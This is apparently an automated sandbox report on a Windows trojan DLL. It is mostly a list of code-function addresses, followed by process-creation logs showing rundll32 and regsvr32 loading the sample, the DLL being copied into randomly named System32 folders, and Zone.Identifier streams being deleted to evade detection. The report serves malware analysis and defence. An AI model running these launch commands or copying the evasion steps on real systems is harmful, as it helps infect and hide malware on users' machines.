                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_0000000180010FF4
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000000018002C058
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_0000000180009100
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000000018000C608
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_0000000180021618
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000000018001E3AC
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000000018001DBE8
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000000018001FC0C
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000000018000580C
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_0000000180022010
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000000018001481C
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000000018002A42C
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_0000000180011834
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_0000000180021C3C
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000000018000703C
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000000018000AC48
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000000018000FC48
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_0000000180006458
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000000018001C05C
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000000018001A460
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_0000000180029888
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000000018001D49C
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_0000000180008CA0
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_00000001800248A8
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_0000000180015CB0
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_00000001800124B4
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000000018000C4B4
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_00000001800288B8
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_00000001800024B8
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000000018000D8C4
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_00000001800250CC
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_00000001800190D4
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_0000000180017CE4
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_00000001800264F0
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_00000001800014F8
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_0000000180020CFC
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000000018002C904
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_0000000180017908
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_0000000180021510
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000000018000F917
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000000018000551C
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000000018000F128
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000000018001CD38
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_0000000180016D3C
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000000018001F944
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_0000000180018148
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000000018001ED50
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_0000000180013150
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000000018001D950
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000000018001E960
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_0000000180019D60
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000000018001C964
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_0000000180001D68
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000000018001496C
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_0000000180002D70
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_0000000180002178
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_0000000180024D80
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_0000000180018598
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_0000000180003598
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000000018002A9A8
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_00000001800119A8
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_0000000180025DAC
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_0000000180018DAC
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_00000001800269B0
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_00000001800059B8
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_00000001800029BC
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_00000001800141C0
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_00000001800125C4
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_00000001800121CC
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_00000001800075D4
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_00000001800095DC
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000000018000F9E8
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_0000000180002610
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_0000000180019618
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_0000000180013E28
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000000018001FA38
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000000018000A270
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_0000000180019E78
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000000018001DA80
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_0000000180024698
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000000018000EE98
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_00000001800176B8
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000000018001AAB8
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_0000000180011AD0
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_0000000180008AD8
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_00000001800296EC
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000000018000A6EC
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_00000001800132F0
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_0000000180019300
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000000018001BB04
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000000018002870C
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_0000000180026B10
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000000018000131C
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000000018000671C
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_0000000180029B28
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_0000000180012F28
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000000018000BB28
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000000018001EB30
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_0000000180020334
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_0000000180010758
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000000018001435C
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_0000000180009F5C
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_0000000180029368
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_0000000180020768
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_0000000180017378
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_0000000180013780
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_0000000180015388
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000000018000338C
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000000018000738C
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_0000000180002790
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_00000001800197A0
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000000018002C7B4
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000000018001DFB4
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000000018001F7C0
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_00000001800097C0
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_00000001800157D8
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_0000000180019FDC
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_0000000180017BDC
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000000018000F7E0
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_0000000180001FE0
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_0000026C83770000
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_006D0000
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_0000000180010FF4
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_0000000180028C20
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_000000018002C058
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_000000018001ACA4
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_000000018000551C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_0000000180018148
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_000000018001496C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_000000018000E1E0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_000000018000C608
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_0000000180021618
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_0000000180013E28
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_000000018002AE44
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_000000018000D26C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_0000000180025278
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_000000018000EE98
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_00000001800046A8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_0000000180004ACA
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_00000001800132F0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_0000000180026B10
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_000000018001DBE8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_000000018001FC0C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_000000018000580C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_0000000180022010
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_000000018001481C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_000000018002A42C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_0000000180011834
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_0000000180021C3C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_000000018000703C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_000000018000AC48
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_000000018000FC48
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_0000000180024458
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_0000000180006458
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_000000018001C05C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_000000018001A460
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_0000000180029888
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_000000018001D49C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_0000000180008CA0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_00000001800248A8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_0000000180015CB0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_00000001800124B4
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_000000018000C4B4
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_00000001800288B8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_00000001800024B8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_000000018000D8C4
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_00000001800250CC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_00000001800190D4
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_0000000180017CE4
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_00000001800264F0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_00000001800014F8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_0000000180020CFC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_0000000180009100
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_000000018002C904
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_0000000180017908
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_0000000180021510
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_000000018000F917
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_000000018000F128
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_000000018001CD38
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_0000000180016D3C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_000000018001F944
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_000000018001D950
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_0000000180013150
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_000000018001ED50
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_000000018001E960
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_0000000180019D60
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_000000018001C964
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_000000018001C568
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_0000000180001D68
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_0000000180002D70
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_0000000180024574
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_0000000180002178
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_0000000180024D80
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_0000000180018598
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_0000000180003598
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_000000018001F1A4
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_000000018002A9A8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_00000001800119A8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_0000000180025DAC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_0000000180018DAC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_00000001800269B0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_00000001800059B8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_00000001800029BC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_00000001800141C0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_00000001800125C4
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_00000001800121CC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_000000018000BDD0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_00000001800075D4
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_00000001800095DC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_000000018000F9E8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_0000000180002610
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_0000000180019618
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_000000018001FA38
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_000000018000A270
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_0000000180019E78
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_000000018001DA80
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_0000000180024698
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_00000001800176B8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_000000018001AAB8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_000000018002CAD0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_0000000180011AD0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_0000000180008AD8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_00000001800296EC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_000000018000A6EC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_0000000180019300
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_000000018001BB04
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_000000018002870C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_000000018000131C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_000000018000671C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_0000000180029B28
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_0000000180012F28
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_000000018000BB28
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_000000018001EB30
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_0000000180020334
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_0000000180010758
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_000000018001435C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_0000000180009F5C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_0000000180029368
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_0000000180020768
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_0000000180017378
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_0000000180013780
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_0000000180015388
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_000000018000338C
                      Source: C:\Windows\System32\regsvr32.exeSection loaded: sfc.dll
                      Source: C:\Windows\System32\regsvr32.exeSection loaded: sfc.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: xboxlivetitleid.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: cdpsgshims.dll
                      Source: TSvDnT6fkE.dllVirustotal: Detection: 33%
                      Source: TSvDnT6fkE.dllStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                      Source: C:\Windows\System32\loaddll64.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                      Source: unknownProcess created: C:\Windows\System32\loaddll64.exe loaddll64.exe "C:\Users\user\Desktop\TSvDnT6fkE.dll"
                      Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\TSvDnT6fkE.dll",#1
                      Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\regsvr32.exe regsvr32.exe /s C:\Users\user\Desktop\TSvDnT6fkE.dll
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\TSvDnT6fkE.dll",#1
                      Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe C:\Users\user\Desktop\TSvDnT6fkE.dll,DllRegisterServer
                      Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe C:\Users\user\Desktop\TSvDnT6fkE.dll,DllUnregisterServer
                      Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\System32\regsvr32.exe C:\Windows\system32\regsvr32.exe "C:\Windows\system32\LqleYRChPKuppQ\QMAA.dll"
                      Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
                      Source: unknownProcess created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k localservice -p -s CDPSvc
                      Source: unknownProcess created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k networkservice -p -s DoSvc
                      Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k NetworkService -p
                      Source: unknownProcess created: C:\Windows\System32\SgrmBroker.exe C:\Windows\system32\SgrmBroker.exe
                      Source: unknownProcess created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k localservicenetworkrestricted -p -s wscsvc
                      Source: unknownProcess created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k unistacksvcgroup
                      Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                      Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
                      Source: C:\Windows\System32\svchost.exeProcess created: C:\Program Files\Windows Defender\MpCmdRun.exe "C:\Program Files\Windows Defender\mpcmdrun.exe" -wdenable
                      Source: C:\Program Files\Windows Defender\MpCmdRun.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
                      Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
                      Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
                      Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\TSvDnT6fkE.dll",#1
                      Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\regsvr32.exe regsvr32.exe /s C:\Users\user\Desktop\TSvDnT6fkE.dll
                      Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe C:\Users\user\Desktop\TSvDnT6fkE.dll,DllRegisterServer
                      Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe C:\Users\user\Desktop\TSvDnT6fkE.dll,DllUnregisterServer
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\TSvDnT6fkE.dll",#1
                      Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\System32\regsvr32.exe C:\Windows\system32\regsvr32.exe "C:\Windows\system32\LqleYRChPKuppQ\QMAA.dll"
                      Source: C:\Windows\System32\svchost.exeProcess created: C:\Program Files\Windows Defender\MpCmdRun.exe "C:\Program Files\Windows Defender\mpcmdrun.exe" -wdenable
                      Source: C:\Windows\System32\regsvr32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{D105A4D4-344C-48EB-9866-EE378D90658B}\InProcServer32
                      Source: C:\Windows\System32\svchost.exeFile created: C:\Users\user\AppData\Local\packages\ActiveSync\LocalState\DiagOutputDir\UnistackCritical.etlJump to behavior
                      Source: classification engineClassification label: mal80.troj.evad.winDLL@28/6@0/2
                      Source: C:\Windows\System32\regsvr32.exeFile read: C:\Users\desktop.iniJump to behavior
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_00000001800046A8 CreateToolhelp32Snapshot,Process32NextW,Process32FirstW,FindCloseChangeNotification,
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\TSvDnT6fkE.dll",#1
                      Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:6652:120:WilError_01
                      Source: C:\Windows\System32\svchost.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Windows\System32\svchost.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Windows\System32\svchost.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Windows\System32\svchost.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: TSvDnT6fkE.dllStatic PE information: Image base 0x180000000 > 0x60000000
                      Source: TSvDnT6fkE.dllStatic PE information: DYNAMIC_BASE, NX_COMPAT
                      Source: Binary string: msacm32.pdb source: regsvr32.exe, 00000006.00000002.663841295.0000000000475000.00000004.00000010.00020000.00000000.sdmp
                      Source: Binary string: msacm32.pdbGCTL source: regsvr32.exe, 00000006.00000002.663841295.0000000000475000.00000004.00000010.00020000.00000000.sdmp
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_000000018001AFFD push ebp; retf
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_00000001800051D1 push ebp; iretd
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_000000018001BA32 push ebp; retf
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_0000000180004E83 push es; ret
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_000000018001B694 push es; ret
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_000000018001BADD push ebp; iretd
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_000000018001B717 push ebp; iretd
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_000000018001AF4E push ebp; retf
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_000000018001AFFD push ebp; retf
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_00000001800051D1 push ebp; iretd
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_000000018001BA32 push ebp; retf
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_0000000180004E83 push es; ret
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_000000018001B694 push es; ret
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_000000018001BADD push ebp; iretd
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_000000018001B717 push ebp; iretd
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_0000000180007B3F push esp; retf
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_000000018001AF4E push ebp; retf
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000000018001AFFD push ebp; retf
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_00000001800051D1 push ebp; iretd
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000000018001BA32 push ebp; retf
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_0000000180004E83 push es; ret
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000000018001B694 push es; ret
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000000018001BADD push ebp; iretd
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000000018001B717 push ebp; iretd
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_0000000180007B3F push esp; retf
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000000018001AF4E push ebp; retf
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_00000001800051D1 push ebp; iretd
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_0000000180004E83 push es; ret
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_0000000180007B3F push esp; retf
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_00007FFFF0C9D0B8 LoadLibraryA,GetProcAddress,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,
                      Source: TSvDnT6fkE.dllStatic PE information: real checksum: 0x85ab6 should be: 0x94f48
                      Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\regsvr32.exe regsvr32.exe /s C:\Users\user\Desktop\TSvDnT6fkE.dll
                      Source: C:\Windows\System32\regsvr32.exePE file moved: C:\Windows\System32\LqleYRChPKuppQ\QMAA.dllJump to behavior

                      Hooking and other Techniques for Hiding and Protection

                      barindex
                      Source: C:\Windows\System32\regsvr32.exeFile opened: C:\Windows\system32\LqleYRChPKuppQ\QMAA.dll:Zone.Identifier read attributes | delete
                      Source: C:\Windows\System32\rundll32.exeFile opened: C:\Windows\system32\MdnujfJkXzH\JwtmcI.dll:Zone.Identifier read attributes | delete
                      Source: C:\Windows\System32\rundll32.exeFile opened: C:\Windows\system32\YeyOBhBkyyV\ZkDVoAS.dll:Zone.Identifier read attributes | delete
                      Source: C:\Windows\System32\svchost.exeRegistry key monitored for changes: HKEY_CURRENT_USER_Classes
                      Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOX
